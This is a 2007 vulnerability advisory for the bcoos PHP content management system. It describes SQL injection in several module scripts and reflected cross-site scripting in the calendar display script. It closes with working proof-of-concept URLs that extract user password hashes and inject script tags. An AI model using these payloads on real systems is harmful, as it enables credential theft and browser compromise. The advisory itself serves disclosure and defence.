Home / exploits bcoos-sqlxss.txt
Posted on 29 November 2007
#################################################### Bcoops SQL injection and Cross-site scripting vendor url: http://www.bcoops.net Advisore: http://lostmon.blogspot.com/2007/11/ bcoops-sql-injection-and-cross-site.html vendor notify:YES exploits available: YES #################################################### bcoos is content-community management system written in PHP-MySQL. bcoops contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the arcade/index.php script not properly sanitizing user-supplied input to the 'gid' variable,and myalbum/ratephoto.php script and 'lid' variable are afected by the same flaw This may allow an attacker to inject or manipulate SQL queries in the backend database. bccops contains too a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate the 'day' and 'year' variable upon submission to modules/theecal/display.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity ################# Versions: ################# bcoops 1.0.10 =< vulnerable ################# Solution: ################# No solution at this time !!! ################# Timeline: ################# Discovered:25-11-2007 vendor notify:27-11-2007 vendor response:------- disclosure:28-11-2007 ################# SQL intections: ################# http://localhost/modules/arcade/index.php?act=show_stats &gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 http://localhost/modules/myalbum/ratephoto.php? lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 http://localhost/modules/mylinks/ratelink.php? lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 ##################### Cross-site Scripting ##################### http://localhost/modules/ecal/display.php? day=17&month=11&year=2007"><script>alert()</script> http://localhost/modules/ecal/display.php? day=1"><script>alert()</script>&month=11&year=2007 #######################